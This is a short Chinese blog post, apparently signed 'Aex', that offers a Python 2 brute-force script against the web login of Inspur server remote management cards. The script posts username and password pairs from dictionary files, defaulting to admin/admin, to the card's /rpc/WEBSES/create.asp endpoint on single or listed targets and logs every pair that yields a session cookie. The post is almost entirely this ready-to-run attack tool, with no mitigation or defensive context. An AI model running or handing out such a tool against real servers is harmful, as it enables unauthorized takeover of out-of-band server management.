浪潮远控卡登录爆破漏洞(附爆破脚本)

#!/usr/bin/env python
# -*- coding:utf-8 -*-

#import lib files
import os
import sys
import logging
import requests
from optparse import OptionParser

#global configuration set
reload(sys)
sys.setdefaultencoding("utf-8")
logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO)

#global varites defines
HEADER = {
    "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0",
    "Accept":"application/json, text/plain, */*",
    "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding":"gzip, deflate",
    "Content-Type":"application/json;charset=utf-8"
}
SUCCESS_FLAG = "SESSION_COOKIE"
USERNAME_LIST = ["admin"]
PASSWORD_LIST = ["admin"]

#global functions defines
def config_read_from_file(userfile,pswdfile):
    global USERNAME_LIST
    global PASSWORD_LIST
    logging.info("[+] Read Configuration From File ...")
    try:
        with open(userfile,"r") as fr:
            for line in fr.readlines():
                line = line.split("\n")[0].split("\r")[0]
                USERNAME_LIST.append(line)
    except Exception,ex:
        logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
        logging.error(logstr)
        logging.info("[+] Use Default Dict!")
    try:
        with open(pswdfile,"r") as fr:
            for line in fr.readlines():
                line = line.split("\n")[0].split("\r")[0]
                PASSWORD_LIST.append(line)
    except Exception,ex:
        logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
        logging.error(logstr)
        logging.info("[+] Use Default Dict!")
    return 0

def login_packet_send(target,username,password):
    login_data = {"WEBVAR_USERNAME":username,"WEBVAR_PASSWORD":password}
    try:
        response = requests.post("http://%s/rpc/WEBSES/create.asp"%str(target),headers=HEADER,data=login_data,timeout=5)
    except Exception,ex:
        logstr = "[-] Connect Failed Reason:%s"%str(ex)
        logging.error(logstr)
        return -1
    if response.status_code != 200:
        return -1
    else:
        return response.content

def vuln_check(content):
    if content.find(SUCCESS_FLAG) >= 0 and content.find("Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius") < 0:
        return 0
    else:
        return -1

def crack(target,username,password):
    content = login_packet_send(target,username,password)
    if content != -1:
        if vuln_check(content) == 0:
            logging.info("[*] Crack %s Success! Username:%s,Password:%s"%(str(target),str(username),str(password)))
            return 0
    return -1

def scan(target,targettype):
    targetlist = []
    if targettype == 1:
        try:
            with open(target,"r") as fr:
                for line in fr.readlines():
                    line = line.split("\n")[0].split("\r")[0].replace(" ","")
                    targetlist.append(line)
        except Exception,ex:
            pass
    else:
        targetlist = [target]
    if len(target) > 0:
        for item in targetlist:
            for user in USERNAME_LIST:
                for pswd in PASSWORD_LIST:
                    crack(item,user,pswd)

#main function -- programme
if __name__ == "__main__": 
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target",help="target to check")
    parser.add_option("-f", "--filename", dest="targetfile",help="targetfiel to check")
    parser.add_option("-u", "--userfile", dest="userfile",help="username dict")
    parser.add_option("-p", "--pswdfile", dest="pswdfile",help="password dict")
    (options, args) = parser.parse_args()
    config_read_from_file(options.userfile,options.pswdfile)
    if options.target not in ["",None," "]:
        scan(options.target,0)
    elif options.targetfile not in ["",None," "]:
        scan(options.targetfile,1)

 

文 / Aex
LEAVE A REPLY
loading